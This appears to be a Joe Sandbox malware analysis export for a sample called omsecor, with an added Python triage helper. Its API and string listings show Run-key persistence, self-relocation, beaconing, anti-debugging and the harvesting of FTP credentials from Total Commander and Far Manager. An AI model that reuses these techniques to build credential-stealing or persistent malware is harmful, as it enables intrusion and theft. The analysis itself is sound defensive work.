                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountTick
                          • String ID: .html$0$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                          • API String ID: 536389180-697497794
                          • Opcode ID: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                          • Opcode Fuzzy Hash: 84a0e12b251b3718d34eddf76b775ad89a92ce41e4fff3615f2568cd6720db27
                          • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                          Control-flow Graph

                          control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 176 40a7ae-40a7b1 172->176 176->170 178 40a79e-40a7a3 Sleep 176->178 178->172 184 40a800-40a815 call 405529 182->184 183->184 188 40a823-40a826 call 4056f9 184->188 189 40a817-40a821 184->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 199 40a859-40a87e call 405529 call 4078cb call 40a718 196->199 197->199 206 40a880-40a892 call 40a744 199->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
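
Persistence (RegOpenKeyExW on the Run key under both HKCU 0x80000001 and HKLM 0x80000002, then GetModuleFileNameW, CopyFileW and ExitProcess to relocate and restart) and the beacon loop (Sleep 0x2710 and 0xEA60, i.e. 10 s and 60 s, InternetOpenUrlW with dwFlags 0x04400000) are readable straight from the API reference lines in the blocks above. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses lines in the report's "API.MODULE(args), ref: ADDRESS" form (the embedded sample lines are copied from the blocks above as constructed input), resolves the predefined hive handles, converts the Sleep arguments to seconds, checks for the copy-then-exit order and decodes the WinINet flag bits using the values from wininet.h.

```python
import re
from typing import Dict, List

# Constructed input: API reference lines copied from the function blocks above.
SAMPLE_LINES = r"""
• Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
• Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
• GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
• CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
• ExitProcess.KERNEL32 ref: 0040B44D
• Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
• Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
• InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
"""

# "• [Part of subcall function X:] Api.MODULE(args), ref: ADDR" or "Api.MODULE ref: ADDR"
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined hive handles (winreg.h) as they appear in RegOpenKeyExW's first argument.
HIVES = {"80000001": "HKEY_CURRENT_USER", "80000002": "HKEY_LOCAL_MACHINE"}

# dwFlags bits for InternetOpenUrl/HttpOpenRequest (wininet.h).
INET_FLAGS = {
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x80000000: "INTERNET_FLAG_RELOAD",
}


def parse_api_refs(text: str) -> List[Dict]:
    """Turn report lines into {api, module, args, ref} records; lines in another format are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)})
    return calls


def persistence_run_keys(calls: List[Dict]) -> List[str]:
    """Run keys opened via RegOpenKeyExW(hive, subkey, ...), with the hive handle resolved to its name."""
    keys = []
    for c in calls:
        if c["api"] == "RegOpenKeyExW" and len(c["args"]) >= 2:
            hive = HIVES.get(c["args"][0].upper())
            if hive and c["args"][1].upper().endswith("\\CURRENTVERSION\\RUN"):
                keys.append(f"{hive}\\{c['args'][1]}")
    return keys


def sleep_intervals_seconds(calls: List[Dict]) -> List[float]:
    """Sleep(dwMilliseconds) arguments in seconds; unresolved '?' arguments are skipped."""
    out = []
    for c in calls:
        if c["api"] == "Sleep" and c["args"]:
            try:
                out.append(int(c["args"][0], 16) / 1000.0)
            except ValueError:
                pass
    return out


def self_copy_then_exit(calls: List[Dict]) -> bool:
    """True if GetModuleFileNameW, CopyFileW and ExitProcess occur in that order by address,
    the relocate-and-restart pattern at 0040B413 / 0040B435 / 0040B44D above."""
    wanted = ["GetModuleFileNameW", "CopyFileW", "ExitProcess"]
    idx = 0
    for c in sorted(calls, key=lambda c: c["ref"]):
        if c["api"] == wanted[idx]:
            idx += 1
            if idx == len(wanted):
                return True
    return False


def decode_inet_flags(value: int) -> List[str]:
    """Known wininet.h flag names set in value, lowest bit first; leftover bits are reported as hex."""
    names = [name for bit, name in sorted(INET_FLAGS.items()) if value & bit]
    rest = value & ~sum(INET_FLAGS)
    if rest:
        names.append(f"unknown:0x{rest:08X}")
    return names


def inet_open_url_flags(calls: List[Dict]) -> List[str]:
    """Decode dwFlags, the fifth argument of the first InternetOpenUrlW call."""
    for c in calls:
        if c["api"] == "InternetOpenUrlW" and len(c["args"]) >= 5:
            return decode_inet_flags(int(c["args"][4], 16))
    return []


if __name__ == "__main__":
    calls = parse_api_refs(SAMPLE_LINES)
    print("Run keys:", persistence_run_keys(calls))
    print("Sleep intervals (s):", sleep_intervals_seconds(calls))
    print("Self-copy then exit:", self_copy_then_exit(calls))
    print("InternetOpenUrlW flags:", inet_open_url_flags(calls))
```

Feed it the whole function listing rather than the excerpt to get the full set of Run keys and timers; the copy-then-exit check is deliberately order-based so that the same three APIs spread across unrelated functions do not trigger it.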

                          Control-flow Graph

                          control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

                          Control-flow Graph

                          control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 235 407e44-407e4c 230->235 233 407eba 231->233 234 407e7e-407e82 231->234 237 407ebc-407ebe 233->237 234->233 236 407e84 234->236 235->231 235->233 238 407e86-407e8f 236->238 238->238 239 407e91-407ea7 call 405493 238->239 239->233 242 407ea9-407eb8 call 405511 239->242 242->237
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

                          Control-flow Graph (function at 0x40ac20; rendered graph not included in this text export)
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                          • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                          • API String ID: 3546245721-4228964922
                          • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                          • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                          • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                          Control-flow Graph

                          APIs
                          • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                          • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                          Similarity
                          • API ID: CharLower$CommandFileLineModuleName
                          • String ID: /nomove
                          • API String ID: 1338073227-1111986840
                          • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                          • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                          • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                          Control-flow Graph (function at 0x407cd7; rendered graph not included in this text export)
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

                          Control-flow Graph (function at 0x407727; rendered graph not included in this text export)
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                          • GetLastError.KERNEL32(00000004), ref: 004077A9
                            • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                            • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          Similarity
                          • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                          • String ID:
                          • API String ID: 1536607067-0
                          • Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                          • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                          • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                          Control-flow Graph (function at 0x4077f0; rendered graph not included in this text export)
                          APIs
                          • _memset.LIBCMT ref: 00407800
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                          Similarity
                          • API ID: CreateProcess_memset
                          • String ID:
                          • API String ID: 1177741608-0
                          • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                          • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                          • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                          Control-flow Graph (function at 0x4069c0; rendered graph not included in this text export)
                          APIs
                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                          • RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          Similarity
                          • API ID: CloseQueryValue
                          • String ID:
                          • API String ID: 3356406503-0
                          • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                          • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                          • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                          Control-flow Graph (function at 0x406d14; rendered graph not included in this text export)
                          APIs
                          • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                          Similarity
                          • API ID: Internet$AttemptConnectOpen
                          • String ID:
                          • API String ID: 2984283330-0
                          • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                          • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                          • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                          • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                          • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                          Similarity
                          • API ID: PrivateProfileString$AllocHeap
                          • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                          • API String ID: 2479592106-2015850556
                          • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                          • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                          • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
                          APIs
                            • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                            • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                          • GetSystemMetrics.USER32(00000000), ref: 004032E5
                          • GetSystemMetrics.USER32(00000001), ref: 004032ED
                          • VirtualProtect.KERNEL32(75A90B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                          • VirtualProtect.KERNEL32(75A90B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                          • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                          • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                          • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                          • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                          • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                          Similarity
                          • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                          • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                          • API String ID: 3066332896-2664446222
                          • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                          • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                          • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                          • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                          • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                          • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                          Similarity
                          • API ID: PrivateProfile$String$AllocHeap$CombinePath
                          • String ID: ftp://%s:%s@%s:%u$pass$port$user
                          • API String ID: 3432043379-2696999094
                          • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                          • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                          • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                          • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                          • Sleep.KERNEL32(00000000), ref: 00408342
                          • Sleep.KERNEL32(00000000), ref: 00408377
                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                          • FindClose.KERNEL32(00000000), ref: 004083B9
                          Similarity
                          • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                          • String ID: .$.$.8@$.8@
                          • API String ID: 2348139788-2639049386
                          • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                          • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                          • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                          • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                          • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                          • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                          • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                          • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                          • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                          • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                          Similarity
                          • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                          • String ID: \netprotdrvss.exe$begun.ru
                          • API String ID: 2887986221-2660752650
                          • Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                          • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                          • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                            • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                            • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                            • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                          Similarity
                          • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                          • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                          • API String ID: 2046068145-3914982127
                          • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                          • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                          • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                          APIs
                          • OleInitialize.OLE32(00000000), ref: 004027F5
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                          Similarity
                          • API ID: Internet$InitializeOpenOption
                          • String ID: From: true
                          • API String ID: 1176259655-9585188
                          • Opcode ID: 97ee820607911564f81d2c28c98cc723bebeae55605858c30cb2ec0cfeb5fbf8
                          • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                          • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                          APIs
                            • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                          • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                          • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                          • GetLastError.KERNEL32(?), ref: 00402F4E
                          • GetLastError.KERNEL32 ref: 00403237
                          • GetLastError.KERNEL32(?), ref: 00403258
                          Similarity
                          • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                          • String ID: .html$From: $Via: $^client=$^key=$file$none
                          • API String ID: 2247176544-3749385445
                          • Opcode ID: 11d3048b97e390bc55daf18a5165622c721ea4f879a8cde4a2ec179576955272
                          • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                          • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                          • RegCloseKey.ADVAPI32(?), ref: 0040442A
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Similarity
                          • API ID: HeapOpen$AllocCloseEnumFree
                          • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                          • API String ID: 416369273-4007225339
                          • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
